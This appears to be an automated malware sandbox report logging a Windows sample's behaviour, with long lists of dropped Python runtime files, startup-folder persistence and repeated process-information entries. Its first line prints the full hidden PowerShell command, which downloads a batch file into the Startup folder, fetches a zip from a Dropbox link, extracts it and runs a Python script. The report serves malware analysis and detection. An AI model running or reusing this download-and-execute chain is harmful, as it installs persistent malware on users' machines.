          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_overlapped.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\tcl86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_lzma.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ssl.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_bz2.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_msi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_sqlite3.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\tk86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\python.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testinternalcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libcrypto-1_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_queue.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_decimal.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\vcruntime140_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testbuffer.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testimportmultiple.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_asyncio.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ctypes.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libffi-7.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testconsole.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_socket.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\sqlite3.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\python310.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\winsound.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_multiprocessing.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ctypes_test.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libssl-1_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_elementtree.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_hashlib.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\unicodedata.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\select.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\pyexpat.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\Icons\README.txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\idle_test\README.txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\README.txtJump to behavior

          Boot Survival

          barindex
          Drops script or batch files to the startup folder
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.batJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.batJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.batJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Document\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4172Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5579Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3142Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 874Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_overlapped.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\tcl86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_lzma.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_ssl.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_msi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\DLLs\_bz2.pydJump to dropped file
